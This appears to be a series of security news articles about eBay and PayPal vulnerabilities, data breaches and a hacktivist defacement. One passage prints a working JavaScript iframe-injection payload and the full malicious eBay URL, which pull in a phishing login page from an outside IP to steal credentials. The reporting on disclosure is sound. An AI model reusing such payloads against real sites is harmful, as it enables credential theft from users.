The Hacker News — Cyber Security, Hacking, Technology News

A simple, yet effective flaw discovered on eBay's website exposed hundreds of millions of its customers to an advance Phishing Attack.

An Independent Security Researcher reported a critical vulnerability to eBay last month that had the capability to allow hackers to host a fake login page, i.e. phishing page, on eBay website in an effort to steal users' password and harvest credentials from millions of its users.

The researchers, nicknamed MLT, said anyone could have exploited the vulnerability to target eBay users in order to take over their accounts or harvest thousands, or even millions, of eBay customers credentials by sending phishing emails to them.

MLT published a blog post about the eBay flaw on Monday, demonstrating how easy it is to exploit the flaw like this and steal customers' passwords.

MLT included an iframe link to his own 3rd-party phishing page within eBay's regular URL, which makes it look like the login page "was hosted on the legitimate eBay website".

The login page looked almost exactly like eBay's actual login page, except the second part of the customised URL, which most of the users don't even notice.

In this case, the iFrame containing the researcher's phishing page was injected to the page using the following payload:

document.write(‘<iframec=”http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html&#8221; width=”1500″ height=”1000″>’) 

Here is the full URL, including the above payload, at time of injection:

http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29

Here's the screenshot of the URL:

After this was done, MLT typed his username and password on the infected website and hit sign in, which gave him an error. But meanwhile, he was able to snatch the entered credentials in plaintext.

MLT also provided a video proof-of-concept, demonstrating the flaw in real-time. You can watch the video below:

MLT responsibly reported the flaw to eBay on December 11, but after an initial response asking for more information the following day, the company stopped responding to the researcher’s emails and did not release a patch, even after knowing the consequences of the flaw.

However, when media contacted eBay asking about the vulnerability, the company rushed to release a patch on Monday and acknowledged MLT's finding on its site's page dedicated to thanking white hat hackers who responsibly report bugs on its website.

The eBay owned popular digital payment and money transfer service, PayPal has been found to be vulnerable to a critical web application vulnerability that could allow an attacker to take control over users' PayPal account with just a click, affecting more than 156 millions PayPal users.

An Egyptian security researcher, Yasser H. Ali has discovered three critical vulnerabilities in PayPal website including CSRF, Auth token bypass and Resetting the security question, which could be used by cybercriminals in the targeted attacks.

Cross-Site Request Forgery (CSRF or XSRF) is a method of attacking a website in which an attacker need to convince the victim to click on a specially crafted HTML exploit page that will make a request to the vulnerable website on their behalf.

Mr.Yasser demonstrated the vulnerability step-by-step in the Proof-of-Concept (PoC) video using a single exploit that combines all the three vulnerabilities. According to the demo, using Paypal CSRF exploit an attacker is able to secretly associate a new secondary email ID (attacker's email) to the victim's account, and also reset the answers of the security questions from target account.

PayPal uses security Auth tokens for detecting the legitimate requests from the account holder, but Mr. Yasser successfully bypassed it to generate exploit code for targeted attacks, as shown in the video.

Yasser told The Hacker News, "I found out that the CSRF Auth is Reusable for that specific user email address or username, this means If an attacker found any of these CSRF Tokens, He can then make actions in the behave of any logged in user."

Once executed, the exploit will add attacker's email id to victim's account, which could be used to reset the account password using "Forgot Password" option from the Paypal website. But the attacker can not change the victim's password without answering the security questions configured by user while signing up.

Yasser found that another bug in PayPal allows him to reset the security questions and their answers of his choice, hence this facilitates him to bypass the PayPal security feature completely in order to reset the new password for the victim's account.

Paypal security team has patched the vulnerability following the Yasser's report via Bug Bounty Program. Three Month ago, Yasser found similar bug in eBay website that allowed hackers to hijack any eBay account in just 1 minute.

UPDATE
PayPal spokesperson released the following statement:

"One of our security researchers recently made us aware of a potential way to bypass PayPal's Cross-Site Request Forgery (CSRF) Protection Authorization System when logging onto PayPal.com. Through the PayPal Bug Bounty program, the researcher reported this to us first and our team worked quickly to fix this potential vulnerability before any of our customers were affected by this issue. We proactively work with security researchers to learn about and stay ahead of potential threats because the security of our customers’ accounts is our top concern." 

It's not been more than 36 hours since eBay revealed it was hacked and we just come to know about three more critical vulnerabilities in eBay website that could allow an attacker to compromise users' account once again, even if you have already reset your account password after the last announcement.

Yesterday eBay admitted to the massive data breach that affected 145 million registered users worldwide after its database was compromised. eBay urged its 145 million users to change their passwords after the cyber attack, but are passwords enough? eBay Data breach happened mainly because of their vulnerable infrastructure, not weak passwords.

I think eBay's morning just going to be bad to worse as today, three Security researchers came forward with three more different types of critical flaws in eBay website that leave its 145 million users vulnerable to hackers.

HACKER UPLOADED SHELL ON eBAY SERVER (UNPATCHED)

A critical security flaw in the eBay website for its employees could allow an attacker to upload a backdoor shell, claimed a security researcher, Jordan Jones who have unearthed the vulnerability.

Security researcher, Jordan Jones claims and tweeted from his account that he already reported the critical flaw to eBay, along with a proof-of-concept screenshot which shows that he has successfully uploaded a 'shell.php' file (as shown), a PHP script that allows the attacker to control the server - essentially a backdoor program.

At the time of writing, we confirmed that the file ‘shell.php’ is available on the Ebay server at given location: "https://dsl.ebay.com/wp-includes/Text/Diff/Engine/shell.php", but modified to a blank file.

In a blog post, Jordan has also reported about a cross site scripting vulnerability in the eBay Research Labs page (labs.ebay.com).

PERSISTENT XSS VULNERABILITY ON eBAY (UNPATCHED)

Michael E., another security researcher from Germany reported The Hacker News that he found a Persistent Cross-Site Scripting (XSS) vulnerability on eBay’s auction pages that allowed him to inject arbitrary HTML and Javascript code into the eBay website.

Each time a user visits any infected auction page created by the attacker, the reported persistent XSS vulnerability will execute the unauthorized Javascript code on the users’ browser with a payload to steal their account cookies, in an effort to hijack the user’s account.

Anyone with an appropriate technical knowledge can create an auction page with malicious javascript, as shown in a proof-of-concept link created by the Michael.

COOKIE RE-USE VULNERABILITY (UNPATCHED)

In a separate experiment, we have discovered that eBay accepts the same login cookies again and again, even if the victims have logged out or reset their passwords.

Which means by using Michael’s persistent XSS vulnerability, one can steal eBay users’ account cookies in order to get an unauthorized access to the users’ respective accounts, without knowing their previous or updated passwords.

ACCOUNT HIJACKING VULNERABILITY (CRITICAL AND  UNPATCHED)

An Egyptian security researcher ‘Yasser H. Ali’ informed The Hacker News about another critical vulnerability on the eBay website, that can seriously allow an attacker to hijack millions of user accounts in bulk and this exploit could be very successful in the targeted attacks.

For now we are keeping technical details of this vulnerability hidden from our readers, Sorry; because it has not been yet addressed by the eBay security team. But last evening, as a proof of concept Mr.Yasser privately demonstrated the vulnerability step-by-step to ‘The Hacker News’ team and we confirm - IT WORKS. We promise to share the technical details of this interesting flaw, once eBay team will patch it.

eBAY #FAILURE

eBay failed badly to protect its 145 million customers’ sensitive data from the previous data breach and yet has not learned any lesson. There are few points, we would like to highlight about eBay’s passive behaviour towards users’ security.

Two months ago hackers stole a database full of eBay users’ information, including customer names, account passwords, email addresses, physical addresses, phone numbers and birth dates, that can be passed on to other criminals. Such sensitive information could be used by a potential hacker to gather more details about the users by sending spam messages and phishing mails, that could lead to problems with identity fraud.

When companies are hacked, alerting customers is usually the first thing. But according to the media reports, even after 30 hours - eBay hasn't emailed all of its users to notify them that they must change their passwords. Also the company has also not made clear how many people were affected in the latest data breach.

According to a separate news on Daily mail, eBay could be fined £500,000 for breach of its data 18 million Britain users. The penalty can be imposed by the Information Commissioner's Office, ‘would amount to just 2p for each of the and 0.00002 per cent of the company's global annual turnover.’ BAD LUCK!

APPEAL TO eBAY

All the above listed vulnerabilities have been reported to the eBay Security team by each researcher, and we hope someone from eBay security team will definitely read this article to understand the threats they could face from malicious hackers.

eBay should be more concern about the security of its users and protective towards its users’ privacy, as the company is responsible for the hundreds of millions of users if it fails at any point.

Please share this article to aware as maximum users as you can.

If you have an eBay Account then you should change your password immediately, because the World's biggest E-commerce company with 128 million active users announced today in a press release that it had been Hacked.

eBay revealed that attackers compromised customers' database including emails, physical addresses, encrypted passwords and dates of birth, in a hacking attack between late February and early March, but financial information like credit card numbers, as well as PayPal information were stored separately and were not compromised.

'After conducting extensive tests on its networks,' They also said they've found no evidence of unauthorized access or activity by registered eBay users, but as precaution, eBay is resetting everyone's passwords that 'will help enhance security for eBay users.'

Why did eBay wait so long to tell everyone? because just two weeks ago they discovered data breach. They conducted a forensic investigation of its computers to find the extent of the theft and found that intruders compromised some employees accounts and then used their access to get the data from servers.

They detected the unauthorized employee logins two weeks ago and “Working with law enforcement and leading security experts, the company is aggressively investigating the matter and applying the best forensics tools and practices to protect customers.” company said.

eBay customers are now potentially vulnerable to phishing attacks i.e. spoofed e-mails. Hackers or spammers could craft very convincing phishing emails which may appear legitimate at first glance, but could trick you into revealing further personal information.

A pro-hacker group, aligned with president Bashar al-Assad, very well known as Syrian Electronic Army (SEA) has again gained the media attention by adding the popular sites, i.e. eBay UK and PayPal UK to its victim list.

After targeting websites of various media agencies, government organizations and big enterprises, including the latest defaced CNN and Microsoft, today they targeted and defaced the official websites of UK’s Ebay (ebay.co.uk) and PayPal (paypal.co.uk).

The group also left a deface page along with a message on the hacked PayPal UK site: “Hacked by Syrian Electronic Army! Fuck the United States Government.”

It is clear that the attack on PayPal could put millions of peoples' bank information at risk, but the group said that the attack is not to target account information of people instead was ‘Purely a Hacktivist Operation’ with the reason behind is the discrimination of Syrian citizens by PayPal company.

“For denying Syrian citizens the ability to purchase online products, PayPal was hacked by SEA”, “If your PayPal account is down for a few minutes, think about Syrians who were denied online payments for more than 3 years. #SEA”, the messages in the Official Twitter account of the group.

PayPal is currently one of the biggest international e-commerce business, allowing payments and money transfers to be made through the Internet. Whereas eBay is an American multinational internet consumer-to-consumer corporation popularly used for Online shopping around the Globe. 

Anuj Nayar, PayPal's senior director of global initiatives, told Mashable, "For a brief period today, a very limited number of people visiting certain PayPal and eBay marketing pages in the UK, France and India were redirected. The issue was quickly detected and resolved. No customer data was accessed by these redirects, and no customer accounts were affected. We take the security and privacy of our customers very seriously and are actively investigating the reasons behind the temporary redirects."

At the time of writing, The official website of Hacking Group was down and the Twitter account has also been suspended.